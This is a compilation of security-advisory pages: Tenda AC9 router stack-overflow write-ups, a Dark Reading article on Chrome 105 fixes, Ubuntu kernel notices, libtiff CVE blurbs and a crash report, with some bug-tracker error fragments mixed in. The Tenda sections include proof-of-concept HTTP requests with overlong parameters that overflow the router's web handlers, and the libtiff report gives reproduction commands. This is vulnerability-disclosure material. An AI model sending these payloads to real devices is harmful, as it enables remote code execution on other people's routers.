Tenda AC9 V15.03.05.19 was discovered to contain a stack overflow via the time parameter at /goform/SetLEDCfg.

Permalink

Cannot retrieve contributors at this time

**Tenda AC9 Wireless Router /goform/SetLEDCfg time Stack Overflow****1 Basic Information**

*   Vulnerability Type: Buffer overflow
*   Vulnerability Description: There is a buffer overflow vulnerability in the Tenda AC9 wireless router, firmware version V15.03.05.19. Its /goform/SetLEDCfg implementation has a security vulnerability in the processing of the time POST key parameter, allowing remote attackers to use the vulnerability to submit special requests, resulting in buffer overflow, which can seriously lead to the execution of arbitrary OS commands.
*   Device model:
    *   Tenda AC9 Wireless Router
    *   Firmware Version: V15.03.05.19

**2 Vulnerability Value**

*   Stable Reproducibility: yes
*   Vulnerability Score (refer to CVSS)
    *   V2: \[8.5 High AV:N/AC:M/Au:S/C:C/I:C/A:C\](https://nvd.nist.gov/vuln-metrics/cvss/v2-calculator ?vector=(AV:N/AC:M/Au:S/C:C/I:C/A:C))
    *   V3.1: \[9.1 High AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H\](https://nvd.nist.gov /vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H&version=3.1)
*   Exploit Conditions
    *   Attack Vector Type: Network
    *   Attack Complexity: Low
    *   Complexity of Exploit
        *   Permission constraints: identity authentication is required
        *   User interaction: no victim interaction required
    *   Scope of Impact: Changed (can affect components other than vulnerable components)
    *   Impact Indicators:
        *   Confidentiality: High
        *   Integrity: High
        *   Availability: High
    *   Stability of Exploits: stable recurrence
    *   Whether the product is configured by default: there are loopholes in the functional components that are enabled from the factory
*   Exploit Effect
    *   Denial of Service
    *   Remote Code Execution (RCE)

**3 PoC**

POST /goform/SetLEDCfg HTTP/1.1
Host: 10.37.129.2:8081
Connection: keep-alive
Content-Length: 445
Accept: \*/\*
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://10.37.129.2:8081
Referer: http://10.37.129.2:8081/system\_led.html?random=0.7969342657337226&
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: bLanguage=cn; password=sou23f

ledType=close&timetimetimetimetimeimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetime=&ledCloseType=undefined

Finally, you can write exp, which can achieve a very stable effect of obtaining the root shell.

**4 Vulnerability Principle**

When the web management component receives a POST request, its /goform/SetLEDCfg component implements a security vulnerability in processing the time POST key parameter. The length of the time parameter key can be any length and is placed on the stack without checking, resulting in a stack overflow. Attackers can use this vulnerability to overwrite the return address, and then be exploited to achieve the effect of remote arbitrary command execution.

CVE-2022-36570: IoTvuln/tenda_ac9_SetLEDCfg.md at main · CyberUnicornIoT/IoTvuln

Tenda AC9 V15.03.05.19 was discovered to contain a stack overflow via the list parameter at /goform/setPptpUserList.

**Tenda AC9 Wireless Router /goform/setPptpUserList list Stack Overflow****1 Basic Information**

*   Vulnerability Type: Buffer overflow
*   Vulnerability Description: A buffer overflow vulnerability exists in the Tenda AC9 wireless router, firmware version V15.03.05.19. Its /goform/setPptpUserList implementation has a security vulnerability in the processing of list POST parameters, allowing remote attackers to use the vulnerability to submit special requests, resulting in buffer overflow, which can seriously lead to the execution of arbitrary OS commands.
*   Device model:
    *   Tenda AC9 Wireless Router
    *   Firmware Version: V15.03.05.19

**2 Vulnerability Value**

*   Stable Reproducibility: yes
*   Vulnerability Score (refer to CVSS)
    *   V2: \[8.5 High AV:N/AC:M/Au:S/C:C/I:C/A:C\](https://nvd.nist.gov/vuln-metrics/cvss/v2-calculator ?vector=(AV:N/AC:M/Au:S/C:C/I:C/A:C))
    *   V3.1: \[9.1 High AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H\](https://nvd.nist.gov /vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H&version=3.1)
*   Exploit Conditions
    *   Attack Vector Type: Network
    *   Attack Complexity: Low
    *   Complexity of exploit
        *   Permission Constraints: identity authentication is required
        *   User Interaction: no victim interaction required
    *   Scope of Impact: Changed (can affect components other than vulnerable components)
    *   Impact Indicators:
        *   Confidentiality: High
        *   Integrity: High
        *   Availability: High
    *   Stability of exploits: stable recurrence
    *   Whether the product is configured by default: there are loopholes in the functional components that are enabled from the factory
*   Exploit Effect
    *   Denial of service
    *   Remote Code Execution (RCE)

**3 PoC**

POST /goform/setPptpUserList HTTP/1.1
Host: 10.37.129.2:8081
Connection: keep-alive
Content-Length: 2048
Accept: \*/\*
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://10.37.129.2:8081
Referer: http://10.37.129.2:8081/system\_led.html?random=0.7969342657337226&
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: bLanguage=cn; password=sou23f

list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;

Finally, you can write exp, which can achieve a very stable effect of obtaining the root shell.

**4 Vulnerability Principle**

When the web management component receives a POST request, its /goform/setPptpUserList component implements a security vulnerability in processing the list POST parameter. The length of the list parameter can be any length and is placed on the stack without checking, resulting in stack overflow. Attackers can use this vulnerability to overwrite the return address, and then be exploited to achieve the effect of remote arbitrary command execution.

CVE-2022-36568: IoTvuln/tenda_ac9_setPptpUserList.md at main · CyberUnicornIoT/IoTvuln

Tenda AC9 V15.03.05.19 was discovered to contain a stack overflow via the deviceList parameter at /goform/setMacFilterCfg.

CVE-2022-36569: IoTvuln/tenda_ac9_setMacFilterCfg.md at main · CyberUnicornIoT/IoTvuln

But one issue that lets websites overwrite content on a user's system clipboard appears unfixed in the new Version 105 of Chrome.

Google's first stable channel version of Chrome 105 for Windows, Mac, and Linux, released this week, contained fixes for 24 vulnerabilities in previous versions of the software, including one "critical" flaw and eight that the company rated as being of "high" severity.

A plurality — nine — of the security issues that Google addressed with Chrome 105 were so-called use-after-free vulnerabilities, or flaws that allow attackers to use previously freed memory spaces to execute malicious code, corrupt data, and take other malicious actions. Four of the patched vulnerabilities were heap buffer-overflows in various Chrome components, including WebUI and Screen Capture.

Attackers often exploit buffer overflows for a variety of malicious purposes, including executing random code, overwriting data, crashing systems, and triggering denial-of-service conditions.

**Clipboard Overwriting**

One issue that Google does not appear to have fixed in the update centers around clipboards. According to Malwarebytes, when users of Google Chrome — or any Chromium-based browser — visit a website, the site can push any content they want to the user's OS clipboard, without the user's permission or any interaction.

"This means that by simply visiting a website, the data on your clipboard may be overwritten without your consent or knowledge," Malwarebytes said.

This can result in users losing valuable data they might have wanted to cut and paste elsewhere while also giving attackers an opening to try and sneak malicious code on a user's system, the security vendor said. The problem has to do with the absence of any requirement in Chrome and Chromium-based browser for users to take specific steps such as using "Ctrl+C" to copy content from a website to the user's clipboard, Malwarebytes said.

Security researcher Jeff Johnson identified the issue with Chrome as part of a broader problem that impacts both Safari and Firefox as well. "Chrome is currently the worst offender, because the user gesture requirement for writing to the clipboard was accidentally broken in version 104," he said in a report this week.

However, the reality is that users of other browsers such as Firefox and Safari can have websites overwriting their system clipboards more easily than they realize, Johnson said. Though both these browsers require users to take some action to copy website content to their clipboards, the actions are a lot broader than they might imagine.

For instance, actions like focusing out on a screen, or pressing keydown/ keyup and mousedown/ mouseup, can result in website content getting copied to the clipboard without the user's knowledge, Johnson said.

The researcher noted that Chrome developers are already aware of the issue and are addressing it. Google did not immediately response to a Dark Reading request for comment.

"Attackers may abuse this bug to copy malicious links to users' clipboards, which could result in users pasting those links in their address bar and accessing malicious sites accidentally," says Ivan Righi, senior cyber threat analyst at Digital Shadows.

"Another way this bug could be exploited is to conduct fraudulent cryptocurrency transactions. Threat actors could leverage the flaw in conjunction with social engineering attacks to get users to enter the wrong wallet addresses for transactions," Righi says. However, the likelihood of such attacks being successful is low because users are likely going to notice abnormal contents placed on their clipboard, he says.

**A Plethora of Use-After-Free Issues**

Meanwhile, the sole critical vulnerability (CVE-2022-3038) Google addressed with the stable version of Chrome 105 was reported by a security researcher from its own Project Zero bug hunting team: The use-after-free flaw in Google Chrome Network Service gives remote attackers a way to execute arbitrary code or trigger denial of service conditions on user systems by getting them to visit a weaponized website.

External bug hunters and security researchers reported all the remaining vulnerabilities that Google addressed this week in Chrome. The most consequential among them appears to have been CVE-2022-3039, a high-severity, user-after-free vulnerability in WebSQL that two researchers from China's 360 Vulnerability Research Institute reported to Google. The researchers received $10,000 for reporting the bug to Google — the highest amount awarded in the current set.

Another high-impact, use-after-free flaw in Chrome Layout garnered $9,000 for the anonymous security researcher that reported the issue to Google. Bounties for the remaining bugs ranged from $1,000 to $7,500. Google has not yet determined rewards for four bug disclosures.

As has become standard practice among major vendors, Google said it has restricted access to bug details until most users have an opportunity to implement the new, stable version of Chrome.

"We will also retain restrictions if the bug exists in a third-party library that other projects similarly depend on but haven’t yet fixed," Google said in a blog this week. A senior Microsoft security executive had recently used the same reason to explain why Microsoft's bug disclosures also contain scant details these days.

While the bug fixes are almost certainly the primary reason why users might want to update to the stable version of Chrome 105, the new browser version also introduces a handful of additional features. These include features that allow developers to add windows controls button — such as closing, maximizing, or minimizing — to progressive Web apps, a new picture-in-picture API for Chrome on Android, and improvements to Chrome's Navigation API.

Google Fixes 24 Vulnerabilities With New Chrome Update

Ubuntu Security Notice 5590-1 - Domingo Dirutigliano and Nicola Guerrera discovered that the netfilter subsystem in the Linux kernel did not properly handle rules that truncated packets below the packet header size. When such rules are in place, a remote attacker could possibly use this to cause a denial of service.

    =========================================================================Ubuntu Security Notice USN-5590-1August 30, 2022linux-oem-5.14 vulnerability=========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTSSummary:The system could be made to crash if it received specially craftednetwork traffic.Software Description:- linux-oem-5.14: Linux kernel for OEM systemsDetails:Domingo Dirutigliano and Nicola Guerrera discovered that the netfiltersubsystem in the Linux kernel did not properly handle rules that truncatedpackets below the packet header size. When such rules are in place, aremote attacker could possibly use this to cause a denial of service(system crash).Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS:  linux-image-5.14.0-1050-oem     5.14.0-1050.57  linux-image-oem-20.04           5.14.0.1050.46  linux-image-oem-20.04b          5.14.0.1050.46  linux-image-oem-20.04c          5.14.0.1050.46  linux-image-oem-20.04d          5.14.0.1050.46After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:  https://ubuntu.com/security/notices/USN-5590-1  CVE-2022-36946Package Information:  https://launchpad.net/ubuntu/+source/linux-oem-5.14/5.14.0-1050.57

Ubuntu Security Notice USN-5590-1

Ubuntu Security Notice 5589-1 - Asaf Modelevsky discovered that the Intel 10GbE PCI Express Ethernet driver for the Linux kernel performed insufficient control flow management. A local attacker could possibly use this to cause a denial of service. It was discovered that the virtual terminal driver in the Linux kernel did not properly handle VGA console font changes, leading to an out-of-bounds write. A local attacker could use this to cause a denial of service or possibly execute arbitrary code.

    ==========================================================================Ubuntu Security Notice USN-5589-1August 30, 2022linux, linux-raspi vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux: Linux kernel- linux-raspi: Linux kernel for Raspberry Pi systemsDetails:Asaf Modelevsky discovered that the Intel(R) 10GbE PCI Express (ixgbe)Ethernet driver for the Linux kernel performed insufficient control flowmanagement. A local attacker could possibly use this to cause a denial of service. (CVE-2021-33061)It was discovered that the virtual terminal driver in the Linux kernel did not properly handle VGA console font changes, leading to an out-of-bounds write. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-33656)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS:   linux-image-5.4.0-1069-raspi    5.4.0-1069.79   linux-image-5.4.0-125-generic   5.4.0-125.141   linux-image-5.4.0-125-generic-lpae  5.4.0-125.141   linux-image-5.4.0-125-lowlatency  5.4.0-125.141   linux-image-generic             5.4.0.125.126   linux-image-generic-lpae        5.4.0.125.126   linux-image-lowlatency          5.4.0.125.126   linux-image-oem                 5.4.0.125.126   linux-image-oem-osp1            5.4.0.125.126   linux-image-raspi               5.4.0.1069.102   linux-image-raspi2              5.4.0.1069.102   linux-image-virtual             5.4.0.125.126After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-5589-1   CVE-2021-33061, CVE-2021-33656Package Information:   https://launchpad.net/ubuntu/+source/linux/5.4.0-125.141   https://launchpad.net/ubuntu/+source/linux-raspi/5.4.0-1069.79

Ubuntu Security Notice USN-5589-1

A flaw was found in Undertow. A potential security issue in flow control handling by the browser over HTTP/2 may cause overhead or a denial of service in the server. This flaw exists because of an incomplete fix for CVE-2021-3629.

'2072339?cve=title' is not a valid bug number nor an alias to a bug.

Please press **Back** and try again.

CVE-2022-1259: Invalid Bug ID

A heap buffer overflow flaw was found in Libtiffs' tiffinfo.c in TIFFReadRawDataStriped() function. This flaw allows an attacker to pass a crafted TIFF file to the tiffinfo tool, triggering a heap buffer overflow issue and causing a crash that leads to a denial of service.

'2074404?cve=title' is not a valid bug number nor an alias to a bug.

Please press **Back** and try again.

CVE-2022-1354: Invalid Bug ID

A stack buffer overflow flaw was found in Libtiffs' tiffcp.c in main() function. This flaw allows an attacker to pass a crafted TIFF file to the tiffcp tool, triggering a stack buffer overflow issue, possibly corrupting the memory, and causing a crash that leads to a denial of service.

'2074415?cve=title' is not a valid bug number nor an alias to a bug.

Please press **Back** and try again.

CVE-2022-1355: Invalid Bug ID

It was found in libtiff 4.4.0rc1 that there is an invalid pointer free operation in TIFFClose() at tif_close.c:131 called by tiffcrop.c:2522 that can cause a program crash and denial of service while processing crafted input.

**Summary**

There is a invalid pointer free() operation in TIFFClose() at tif\_close.c:131 called by tiffcrop.c:2522

131:TIFFCleanup(tif);

**Version**

    root@peng:~/libtiff-v4.4.0rc1# tools/.libs/tiffcrop -v
    Library Release: LIBTIFF, Version 4.4.0
    Copyright (c) 1988-1996 Sam Leffler
    Copyright (c) 1991-1996 Silicon Graphics, Inc.
    Tiffcrop version: 2.5, last updated: 02-09-2022

**Steps to reproduce**

    ./autogen.sh
    ./configure
    make -j
    root@peng:~/libtiff-v4.4.0rc1# gdb --args tools/.libs/tiffcrop -Z 1:4,3:3 -R 90 -H 300 -S 2:2 -i poc1 /tmp/foo
    TIFFFetchDirectory: Can not read TIFF directory count.
    TIFFReadDirectory: Failed to read directory at offset 4279506196.
    free(): invalid pointer
    Program received signal SIGABRT, Aborted.
    __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:51
    51      ../sysdeps/unix/sysv/linux/raise.c: No such file or directory.
    (gdb) bt
    #0  __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:51
    #1  0x00007ffff77a17f1 in __GI_abort () at abort.c:79
    #2  0x00007ffff77ea837 in __libc_message (action=action@entry=do_abort, fmt=fmt@entry=0x7ffff7917a7b "%s\n") at ../sysdeps/posix/libc_fatal.c:181
    #3  0x00007ffff77f18ba in malloc_printerr (str=str@entry=0x7ffff7915c76 "free(): invalid pointer") at malloc.c:5342
    #4  0x00007ffff77f8dec in _int_free (have_lock=0, p=0x55555576f730, av=0x7ffff7b4cc40 <main_arena>) at malloc.c:4167
    #5  __GI___libc_free (mem=0x55555576f740) at malloc.c:3134
    #6  0x00007ffff7b5c9c9 in TIFFClose (tif=<optimized out>) at tif_close.c:131
    #7  0x0000555555559487 in main (argc=<optimized out>, argv=0x7fffffffe348) at tiffcrop.c:2522

**Platform**

uname -a Linux peng 5.4.0-42-generic 18.04.1-Ubuntu SMP Fri Jul 10 07:21:24 UTC 2020 x86\_64 x86\_64 x86\_64 GNU/Linux

poc1

Edited May 22, 2022 by

Tag

#dos